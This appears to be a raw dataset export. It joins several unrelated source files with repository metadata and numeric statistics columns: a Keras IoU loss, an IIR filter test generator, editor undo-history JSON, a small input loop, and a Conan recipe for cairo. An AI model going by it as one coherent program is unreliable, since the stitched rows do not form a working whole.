raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
| 53.371755
| 251
| 0.698504
| 6,641
| 51,397
| 5.124228
| 0.03644
| 0.038877
| 0.050426
| 0.034058
| 0.945489
| 0.926712
| 0.915192
| 0.902028
| 0.898002
| 0.892889
| 0
| 0.00091
| 0.230305
| 51,397
| 962
| 252
| 53.427235
| 0.859302
| 0.458937
| 0
| 0.806683
| 0
| 0
| 0.026224
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054893
| false
| 0
| 0.004773
| 0
| 0.178998
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58bfa069bfa7cc3647a01173c6223477abd52ea5
| 2,671
|
py
|
Python
|
keras_segmentation/data_utils/bounding_box_iou_based_network_utils.py
|
mwaseema/image-segmentation-keras-implementation
|
e137b55c3a19787309f086744e3f7ed1b4df4520
|
[
"MIT"
] | 1
|
2021-12-09T10:33:18.000Z
|
2021-12-09T10:33:18.000Z
|
keras_segmentation/data_utils/bounding_box_iou_based_network_utils.py
|
mwaseema/image-segmentation-keras-implementation
|
e137b55c3a19787309f086744e3f7ed1b4df4520
|
[
"MIT"
] | null | null | null |
keras_segmentation/data_utils/bounding_box_iou_based_network_utils.py
|
mwaseema/image-segmentation-keras-implementation
|
e137b55c3a19787309f086744e3f7ed1b4df4520
|
[
"MIT"
] | 1
|
2022-02-11T18:59:43.000Z
|
2022-02-11T18:59:43.000Z
|
import tensorflow as tf
from keras import backend as K
from keras_segmentation.custom_losses import smooth_l1_loss
def bounding_box_iou_based_network_loss(y_true, y_pred):
pred_x1 = y_pred[:, 0]
pred_y1 = y_pred[:, 1]
pred_x2 = pred_x1 + y_pred[:, 2]
pred_y2 = pred_y1 + y_pred[:, 3]
true_x1 = y_true[:, 0]
true_y1 = y_true[:, 1]
true_x2 = true_x1 + y_true[:, 2]
true_y2 = true_y1 + y_true[:, 3]
intersection_x1 = tf.maximum(pred_x1, true_x1)
intersection_y1 = tf.maximum(pred_y1, true_y1)
intersection_x2 = tf.minimum(pred_x2, true_x2)
intersection_y2 = tf.minimum(pred_y2, true_y2)
intersection_area = tf.maximum(tf.zeros_like(intersection_x1),
intersection_x2 - intersection_x1 + tf.ones_like(intersection_x1)) * tf.maximum(
tf.zeros_like(intersection_y1), intersection_y2 - intersection_y1 + tf.ones_like(intersection_y1))
pred_area = (pred_x2 - pred_x1 + tf.ones_like(pred_x1)) * (pred_y2 - pred_y1 + tf.ones_like(pred_y1))
true_area = (true_x2 - true_x1 + tf.ones_like(true_x1)) * (true_y2 - true_y1 + tf.ones_like(true_y1))
union_area = pred_area + true_area - intersection_area
iou = intersection_area / tf.maximum(union_area, K.epsilon())
iou = K.clip(iou, 0.0 + K.epsilon(), 1.0)
iou_loss = -tf.log(iou)
# convert loss (?,) to (1)
iou_loss = tf.reduce_sum(iou_loss, axis=-1)
l1_loss = smooth_l1_loss(y_true, y_pred)
return iou_loss + l1_loss
def bounding_box_iou_based_network_metric(y_true, y_pred):
pred_x1 = y_pred[:, 0]
pred_y1 = y_pred[:, 1]
pred_x2 = pred_x1 + y_pred[:, 2]
pred_y2 = pred_y1 + y_pred[:, 3]
true_x1 = y_true[:, 0]
true_y1 = y_true[:, 1]
true_x2 = true_x1 + y_true[:, 2]
true_y2 = true_y1 + y_true[:, 3]
intersection_x1 = tf.maximum(pred_x1, true_x1)
intersection_y1 = tf.maximum(pred_y1, true_y1)
intersection_x2 = tf.minimum(pred_x2, true_x2)
intersection_y2 = tf.minimum(pred_y2, true_y2)
intersection_area = tf.maximum(tf.zeros_like(intersection_x1),
intersection_x2 - intersection_x1 + tf.ones_like(intersection_x1)) * tf.maximum(
tf.zeros_like(intersection_y1), intersection_y2 - intersection_y1 + tf.ones_like(intersection_y1))
pred_area = (pred_x2 - pred_x1 + tf.ones_like(pred_x1)) * (pred_y2 - pred_y1 + tf.ones_like(pred_y1))
true_area = (true_x2 - true_x1 + tf.ones_like(true_x1)) * (true_y2 - true_y1 + tf.ones_like(true_y1))
union_area = pred_area + true_area - intersection_area
iou = intersection_area / tf.maximum(union_area, K.epsilon())
return iou
| 36.094595
| 115
| 0.678772
| 427
| 2,671
| 3.854801
| 0.114754
| 0.043742
| 0.072904
| 0.043742
| 0.869988
| 0.859052
| 0.859052
| 0.859052
| 0.816525
| 0.816525
| 0
| 0.053622
| 0.204043
| 2,671
| 73
| 116
| 36.589041
| 0.720602
| 0.008985
| 0
| 0.77551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0
| 0.061224
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58fa83f000f2d5f12eb5c2113826fc258b041c0c
| 1,645
|
py
|
Python
|
tests/blocks/signal/iirfilter_spec.py
|
telent/luaradio
|
c1cb47325e4eb2886915f810fff5324571aeb59d
|
[
"MIT"
] | 559
|
2016-07-02T19:07:39.000Z
|
2022-03-28T15:02:21.000Z
|
tests/blocks/signal/iirfilter_spec.py
|
telent/luaradio
|
c1cb47325e4eb2886915f810fff5324571aeb59d
|
[
"MIT"
] | 68
|
2016-07-03T05:35:47.000Z
|
2022-03-30T21:24:07.000Z
|
tests/blocks/signal/iirfilter_spec.py
|
telent/luaradio
|
c1cb47325e4eb2886915f810fff5324571aeb59d
|
[
"MIT"
] | 64
|
2016-07-02T23:59:10.000Z
|
2022-02-02T18:11:07.000Z
|
import numpy
import scipy.signal
from generate import *
def generate():
def gentaps(n):
b, a = scipy.signal.butter(n - 1, 0.5)
return b.astype(numpy.float32), a.astype(numpy.float32)
def process(b_taps, a_taps, x):
return [scipy.signal.lfilter(b_taps, a_taps, x).astype(type(x[0]))]
vectors = []
x = random_complex64(256)
b_taps, a_taps = gentaps(3)
vectors.append(TestVector([b_taps, a_taps], [x], process(b_taps, a_taps, x), "3 Float32 b taps, 3 Float32 a taps, 256 ComplexFloat32 input, 256 ComplexFloat32 output"))
b_taps, a_taps = gentaps(5)
vectors.append(TestVector([b_taps, a_taps], [x], process(b_taps, a_taps, x), "5 Float32 b taps, 5 Float32 a taps, 256 ComplexFloat32 input, 256 ComplexFloat32 output"))
b_taps, a_taps = gentaps(10)
vectors.append(TestVector([b_taps, a_taps], [x], process(b_taps, a_taps, x), "10 Float32 b taps, 10 Float32 a taps, 256 ComplexFloat32 input, 256 ComplexFloat32 output"))
x = random_float32(256)
b_taps, a_taps = gentaps(3)
vectors.append(TestVector([b_taps, a_taps], [x], process(b_taps, a_taps, x), "3 Float32 b taps, 3 Float32 a taps, 256 Float32 input, 256 Float32 output"))
b_taps, a_taps = gentaps(5)
vectors.append(TestVector([b_taps, a_taps], [x], process(b_taps, a_taps, x), "5 Float32 b taps, 5 Float32 a taps, 256 Float32 input, 256 Float32 output"))
b_taps, a_taps = gentaps(10)
vectors.append(TestVector([b_taps, a_taps], [x], process(b_taps, a_taps, x), "10 Float32 b taps, 10 Float32 a taps, 256 Float32 input, 256 Float32 output"))
return BlockSpec("IIRFilterBlock", vectors, 1e-6)
| 49.848485
| 174
| 0.691185
| 270
| 1,645
| 4.055556
| 0.140741
| 0.118721
| 0.109589
| 0.182648
| 0.77169
| 0.761644
| 0.745205
| 0.745205
| 0.745205
| 0.681279
| 0
| 0.094465
| 0.176292
| 1,645
| 32
| 175
| 51.40625
| 0.713653
| 0
| 0
| 0.24
| 1
| 0
| 0.302736
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12
| false
| 0
| 0.12
| 0.04
| 0.36
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4502ac5fa102e0bc1790c06fd3eb3f8792a57e1e
| 2,652
|
py
|
Python
|
.c9/metadata/environment/helloWorld.py
|
shubhampotale/fuzzy-telegram
|
dff3b55f23ad243b88a8f222d74020c57842193d
|
[
"MIT"
] | null | null | null |
.c9/metadata/environment/helloWorld.py
|
shubhampotale/fuzzy-telegram
|
dff3b55f23ad243b88a8f222d74020c57842193d
|
[
"MIT"
] | null | null | null |
.c9/metadata/environment/helloWorld.py
|
shubhampotale/fuzzy-telegram
|
dff3b55f23ad243b88a8f222d74020c57842193d
|
[
"MIT"
] | null | null | null |
{"filter":false,"title":"helloWorld.py","tooltip":"/helloWorld.py","undoManager":{"mark":6,"position":6,"stack":[[{"start":{"row":2,"column":3},"end":{"row":3,"column":0},"action":"insert","lines":["",""],"id":1},{"start":{"row":3,"column":0},"end":{"row":4,"column":0},"action":"insert","lines":["",""]}],[{"start":{"row":4,"column":0},"end":{"row":4,"column":1},"action":"insert","lines":["P"],"id":2},{"start":{"row":4,"column":1},"end":{"row":4,"column":2},"action":"insert","lines":["r"]},{"start":{"row":4,"column":2},"end":{"row":4,"column":3},"action":"insert","lines":["i"]},{"start":{"row":4,"column":3},"end":{"row":4,"column":4},"action":"insert","lines":["n"]},{"start":{"row":4,"column":4},"end":{"row":4,"column":5},"action":"insert","lines":["t"]}],[{"start":{"row":4,"column":4},"end":{"row":4,"column":5},"action":"remove","lines":["t"],"id":3},{"start":{"row":4,"column":3},"end":{"row":4,"column":4},"action":"remove","lines":["n"]},{"start":{"row":4,"column":2},"end":{"row":4,"column":3},"action":"remove","lines":["i"]},{"start":{"row":4,"column":1},"end":{"row":4,"column":2},"action":"remove","lines":["r"]},{"start":{"row":4,"column":0},"end":{"row":4,"column":1},"action":"remove","lines":["P"]}],[{"start":{"row":4,"column":0},"end":{"row":4,"column":1},"action":"insert","lines":["p"],"id":4},{"start":{"row":4,"column":1},"end":{"row":4,"column":2},"action":"insert","lines":["r"]},{"start":{"row":4,"column":2},"end":{"row":4,"column":3},"action":"insert","lines":["i"]},{"start":{"row":4,"column":3},"end":{"row":4,"column":4},"action":"insert","lines":["n"]},{"start":{"row":4,"column":4},"end":{"row":4,"column":5},"action":"insert","lines":["t"]}],[{"start":{"row":4,"column":5},"end":{"row":4,"column":7},"action":"insert","lines":["()"],"id":5}],[{"start":{"row":4,"column":6},"end":{"row":4,"column":8},"action":"insert","lines":["''"],"id":6}],[{"start":{"row":4,"column":7},"end":{"row":4,"column":8},"action":"insert","lines":["H"],"id":7},{"start":{"row":4,"column":8},"end":{"row":4,"column":9},"action":"insert","lines":["e"]},{"start":{"row":4,"column":9},"end":{"row":4,"column":10},"action":"insert","lines":["l"]},{"start":{"row":4,"column":10},"end":{"row":4,"column":11},"action":"insert","lines":["l"]},{"start":{"row":4,"column":11},"end":{"row":4,"column":12},"action":"insert","lines":["o"]}]]},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":5,"column":0},"end":{"row":5,"column":0},"isBackwards":false},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1607340444785,"hash":"f6fabe8a8d892ef3a1c01be5365611c91b31cd53"}
| 2,652
| 2,652
| 0.553922
| 392
| 2,652
| 3.747449
| 0.145408
| 0.122532
| 0.306331
| 0.20354
| 0.603812
| 0.575221
| 0.549353
| 0.549353
| 0.462219
| 0.462219
| 0
| 0.057692
| 0
| 2,652
| 1
| 2,652
| 2,652
| 0.496229
| 0
| 0
| 0
| 0
| 0
| 0.498681
| 0.015077
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
18914f8c6a7118c8b912c78ac9f81d9599133f5c
| 272
|
py
|
Python
|
PYTHON/pythonDesafios/desafio057.py
|
Santos1000/Curso-Python
|
549223a1633f6f619c87554dd8078cf7841bb1df
|
[
"MIT"
] | null | null | null |
PYTHON/pythonDesafios/desafio057.py
|
Santos1000/Curso-Python
|
549223a1633f6f619c87554dd8078cf7841bb1df
|
[
"MIT"
] | null | null | null |
PYTHON/pythonDesafios/desafio057.py
|
Santos1000/Curso-Python
|
549223a1633f6f619c87554dd8078cf7841bb1df
|
[
"MIT"
] | null | null | null |
sexo = str(input('Digidite (F) ou (M) para indicar se é feminino ou masculino: ')).upper().strip()[0]
while sexo not in 'FMfm':
sexo = str( input( 'Digidite (F) ou (M) para indicar se é feminino ou masculino: ' ) ).upper().strip()[0]
print('Obrigado! sexo registrado')
| 68
| 109
| 0.665441
| 43
| 272
| 4.209302
| 0.534884
| 0.077348
| 0.132597
| 0.220994
| 0.751381
| 0.751381
| 0.751381
| 0.751381
| 0.751381
| 0.751381
| 0
| 0.008734
| 0.158088
| 272
| 4
| 110
| 68
| 0.781659
| 0
| 0
| 0.5
| 0
| 0
| 0.553114
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
18a1815cdbb9b1535638c94583e00d5917a09f9c
| 116
|
py
|
Python
|
collie/movielens/__init__.py
|
RomaKoks/collie_recs
|
bc8979c8dbf68deefb030336d50f07f788cf1667
|
[
"BSD-3-Clause"
] | 70
|
2021-04-13T20:13:35.000Z
|
2021-07-08T03:01:29.000Z
|
collie/movielens/__init__.py
|
RomaKoks/collie_recs
|
bc8979c8dbf68deefb030336d50f07f788cf1667
|
[
"BSD-3-Clause"
] | 18
|
2021-07-13T22:06:11.000Z
|
2022-01-27T16:27:37.000Z
|
collie/movielens/__init__.py
|
RomaKoks/collie_recs
|
bc8979c8dbf68deefb030336d50f07f788cf1667
|
[
"BSD-3-Clause"
] | 11
|
2021-07-14T04:58:49.000Z
|
2022-03-05T00:19:22.000Z
|
from collie.movielens.get_data import *
from collie.movielens.run import *
from collie.movielens.visualize import *
| 29
| 40
| 0.818966
| 16
| 116
| 5.875
| 0.5
| 0.319149
| 0.606383
| 0.531915
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 116
| 3
| 41
| 38.666667
| 0.903846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
18d6e7220d177b964762f0c9b18d552114bc423c
| 12,260
|
py
|
Python
|
cairo/conanfile.py
|
popescu-af/conan-recipes
|
ad3f2eb10ebc4d75357f730374e5f554a577d3aa
|
[
"MIT"
] | null | null | null |
cairo/conanfile.py
|
popescu-af/conan-recipes
|
ad3f2eb10ebc4d75357f730374e5f554a577d3aa
|
[
"MIT"
] | null | null | null |
cairo/conanfile.py
|
popescu-af/conan-recipes
|
ad3f2eb10ebc4d75357f730374e5f554a577d3aa
|
[
"MIT"
] | null | null | null |
from conans import ConanFile, CMake, tools
import os, shutil
cmakelists_txt="""\
project(cairo LANGUAGES C)
cmake_minimum_required(VERSION 3.5)
if(CMAKE_COMPILER_IS_GNUCC)
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -O2 -w -fPIC")
endif()
include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)
conan_basic_setup()
if(NOT CMAKE_BUILD_TYPE)
message(STATUS "Setting CMAKE_BUILD_TYPE to Release")
set(CMAKE_BUILD_TYPE Release)
endif()
# @todo: Hardcoded list for now - sources should be chosen based on compile flags/options.
set(CAIRO_SRC
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-analysis-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-arc.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-array.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-atomic.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-base64-stream.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-base85-stream.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-bentley-ottmann.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-bentley-ottmann-rectangular.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-bentley-ottmann-rectilinear.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-botor-scan-converter.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-boxes.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-boxes-intersect.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-cache.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-clip.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-clip-boxes.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-clip-polygon.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-clip-region.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-clip-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-color.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-composite-rectangles.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-contour.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-damage.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-debug.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-default-context.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-device.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-error.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-fallback-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-fixed.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-font-face.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-font-face-twin.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-font-face-twin-data.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-font-options.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-freelist.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-freed-pool.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-gstate.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-hash.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-hull.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-image-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-image-info.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-image-source.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-image-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-line.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-lzw.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-matrix.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-mask-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-mesh-pattern-rasterizer.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-mempool.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-misc.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-mono-scan-converter.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-mutex.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-no-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-observer.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-output-stream.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-paginated-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-bounds.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-fill.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-fixed.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-in-fill.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-stroke.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-stroke-boxes.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-stroke-polygon.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-stroke-traps.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-stroke-tristrip.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-pattern.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-pen.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-polygon.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-polygon-intersect.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-polygon-reduce.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-raster-source-pattern.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-recording-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-rectangle.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-rectangular-scan-converter.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-region.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-rtree.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-scaled-font.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-shape-mask-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-slope.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-spans.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-spans-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-spline.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-stroke-dash.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-stroke-style.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface-clipper.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface-fallback.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface-observer.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface-offset.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface-snapshot.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface-subsurface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface-wrapper.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-time.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-tor-scan-converter.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-tor22-scan-converter.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-clip-tor-scan-converter.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-toy-font-face.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-traps.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-tristrip.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-traps-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-unicode.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-user-font.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-version.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-wideint.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-cff-subset.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-scaled-font-subsets.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-truetype-subset.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-type1-fallback.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-type1-glyph-names.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-type1-subset.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-type3-glyph-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-pdf-operators.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-pdf-shading.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-deflate-stream.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-display.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-core-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-fallback-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-render-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-screen.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-source.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-surface-shm.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-visual.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-xcb-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-connection.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-connection-core.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-connection-render.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-connection-shm.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-screen.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-shm.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-surface-core.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-surface-render.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-resources.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-png.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-script-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-ft-font.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-ps-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-pdf-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-svg-surface.c
)
if(BUILD_SHARED_LIBS)
add_library(${PROJECT_NAME} SHARED ${CAIRO_SRC})
set_target_properties(${PROJECT_NAME} PROPERTIES POSITION_INDEPENDENT_CODE ON)
else()
add_library(${PROJECT_NAME} STATIC ${CAIRO_SRC})
endif()
target_compile_definitions(${PROJECT_NAME} PRIVATE HAVE_CONFIG_H=1)
target_include_directories(${PROJECT_NAME} SYSTEM
PRIVATE ${CMAKE_CURRENT_SOURCE_DIR}/cairo
PRIVATE ${CONAN_INCLUDE_DIRS_PIXMAN}/pixman #Hack for #include <pixman.h> in cairo sources
)
target_link_libraries(${PROJECT_NAME} ${CONAN_LIBS})
if(UNIX)
target_link_libraries(${PROJECT_NAME}
X11 Xrender Xext X11-xcb xcb xcb-render xcb-shm
fontconfig
)
endif()
"""
class CairoConan(ConanFile):
name = "cairo"
description = "2D graphics library with support for multiple output devices"
version = "1.14.8"
license = "LGPL 2.1"
exports = "*"
url = "https://github.com/popescu-af/conan-recipes"
settings = "os", "compiler", "build_type", "arch"
requires = "pixman/0.34.0@popescu-af/testing", "freetype/2.6.3@lasote/stable"
build_policy = "missing"
